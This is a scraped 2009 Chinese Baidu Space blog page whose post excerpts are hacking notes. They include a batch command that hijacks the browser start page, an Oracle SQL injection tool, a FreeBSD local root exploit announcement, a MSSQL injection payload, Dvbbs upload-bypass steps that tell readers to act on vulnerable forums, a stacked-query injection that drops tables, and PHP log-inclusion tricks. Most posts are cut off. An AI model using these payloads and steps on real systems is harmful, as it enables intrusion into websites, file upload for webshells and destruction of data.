默默许愿's Blog_百度空间
百度空间 | 百度首页 
 
个人档案
 
mmxyblog

上次登录:
3天前
加为好友
 
   
 
日历
 
     
 
文章分类
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
     
 
最新照片
 
   
 
背景音乐
 
 
留言板
 

空间蛮有个性的。。。。。。踩下先,等你回踩
 

你的空间真漂亮,哈哈有空欢迎回访我的空间看看!!(不踩男的没JJ)(女的没MM) 空间...
 

你的空间真好,应该多推广一下,让更多的人欣赏到你的才华
 

可以和你交个朋友吗?教我玩空间
 

你好,你的博客不错呦。我来踩踩,欢迎回访。希望加我好友,谢谢!!
 
     
 
订阅我的空间
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     
 
 
文章列表
 
2009-12-29 16:49

将下面代码直接放进一个批处理中即可.然后将对应地方的网站URL修改成您需要的URL.
复制内容到剪贴板
代码:
@reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://hi.baidu.com/mmxyblog/" /f批处理在桌面添加一个网站的快捷方式
注意:这个快捷方式和用右键中的“发送桌面快捷方式”建立的是不一样的。

复制内容到剪贴板
代码:
echo [InternetShortcut] >>la.u

 
2009-12-29 16:45

'***********************************************************************************************
'oracle union 注入工具 By 孤水绕城
'适用于可以使用union的注入点上
'***********************************************************************************************
'改了Tr4c3的ql2005注射辅助脚本[粗糙版]的框架
Const method = "Get" '提交方式请修改此处,有get和post可选
Const DisPlay = "D" 'S 保存到文件,D输出到屏幕

Dim strUrl_B, strUrl, MyArray,

 
2009-12-15 00:29

** FreeBSD local r00t 0day
Discovered & Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 "BiG TiME"

"Go fetch your FreeBSD r00tkitz" // http://www.youtube.com/watch?v=dDnhthI27Fg

There is an

 
2009-10-11 12:13
and exists(select * from admin where 1=(Select (case when host_name()
=@@servername then 1 else 0 end)))
加在注入点后面,如果返回正常说明web和数据库是同一服务器,如果不正常责说明是分离的.
注意admin是数据库存在的一个表,自己找吧.
 
2009-09-30 01:09

利用的还是IIS的文件名解析漏洞.

影响版本:
Powered By Dvbbs Version 8.2.0
Powered By Dvbbs Version 8.1.0
Powered By Dvbbs Version 8.0.0

注册用户-我的主页-个人空间管理

userspace.asp?sid=0&act=modifyset

然后编辑CSS风格-文件管理

bbs/Dv_plus/myspace/script/filemange.asp

上传 hacknote.asp;hacknote.jpg

接下来知道了吧

赶快行动吧

 
2009-09-24 21:23
如今,针对WEB应用的安全威胁越来越多。这些安全威胁有些是利用WEB站点所在的服务器系统漏洞,有些是利用WEB应用程序本身的漏洞,有些是利用数据库的漏洞来进行攻击的。因此,使用一些方法和工具,对整个WEB站点进行详细的安全评估,找出目前WEB服务器系统、WEB应用程序及数据库中存在的弱点,才有可能将安全威胁抹杀在最初状态。

  在对WEB

 
2009-09-24 21:22
作者:浅凝

很多时候对于开放1521端口的Windows下Oracle数据库服务器,因为大多存在默认低权限用户dbsnmp,或者人品爆发高权限的用户 (sysdba)是默认密码或弱口令,由此可以通过Oracle的一些提权漏洞获取Oracle的最高权限,直至得到系统的SYSTEM权限。

 
2009-09-24 21:20

作者:lcx

'今天搞了个网站,注入点过滤得很变态,工具都不能跑,于是写了这个东东:

set arg=wscript.arguments
If (LCase(Right(Wscript.fullname,11))="Wscript.exe") Then
Wscript.Quit
End

 
2009-09-21 15:06
Mysql是在LAMP和WAMP上最流行的数据库服务器软件套件。DBMS连接默认是不支持堆查询。这就使得一些技术去实施远程代码执行漏
下面的就是再SQL注入攻击中的一个堆查询的例子
SELECT name FROM record WHERE id = 1; DROP table record; DROP table address--
2)把本地文件的内容进行对等的16进制的转换。
3)切分16进制的字符串到1024字符长的大块
4)INSERT 第一个大块进支持表的字段里面
5)UPDATE其他的大的块添加到这个
 
2009-09-21 15:05

关于php包含Apache日志的利用,其实也就是利用提交的网址里有php语句,然后再被Apache服务器的日志记录,然后php再去包含执行,从而包含了去执行。当然,这种办法最大的弊端是Apache日志肯定会过大,回应的时候当然会超时什么的,所以也是受条件限制的。全当一种研究算了。下面是我的测试过程,我觉得很有意思,你也看看。
比如说,在一个php存在包含漏洞就像这样,存在一句php包含漏洞的语句


以下是引用片段:
<? include($zizzy); ?>   //包含变量$zizzy

 
     
 
最近访客
 
 

pxllong

zdixue

包子铺王掌柜

Jasey_Wang

火星来的ET兔

上好—佳

cnwebjs

挚爱_Beyond
     


©2010 Baidu